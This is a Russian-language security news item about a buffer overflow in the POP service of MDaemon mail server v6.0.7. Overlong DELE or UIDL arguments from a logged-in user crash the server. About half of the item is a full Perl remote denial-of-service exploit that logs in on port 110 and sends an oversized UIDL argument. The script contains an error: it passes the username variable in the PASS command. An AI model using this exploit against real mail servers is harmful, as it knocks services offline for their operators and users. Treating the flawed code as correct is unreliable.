Вследствие лёгкости настройки и в целом
универсальности, сервер имеет очень
широкое распространение среди
пользователей win32-платформ. Скачать его
можно с www.mdaemon.com.

Уязвимость найдена в POP-сервисе, а точнее в
обработке им команд DELE и UIDL. Чрезмерная
длина аргумента, переданного вместе с
командой, приводит к переполнению буфера и
аварийному завершению работы всего сервера.
К сожалению, обе эти команды доступны лишь
авторизовавшимся пользователям.

Уязвимость найдена в MDaemon SMTP/POP/IMAP server v.6.0.7.
Более ранние версии скорее всего тоже
уязвимы.

Эксплоит

#!/usr/bin/perl
#MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y
use IO::Socket;
$host = "[vuln_host]";
$login = "[login]";
$pass = "[pass]";
$port = "110";
$data = "1";
$num = "32";
$buf .= $data x $num;
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
Proto => "tcp", Type => SOCK_STREAM)
or die "Couldn't connect: @!\n";
print $socket "USER $login\n";
print $socket "PASS $user\n";
print $socket "UIDL $buf\n";
close($socket);

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии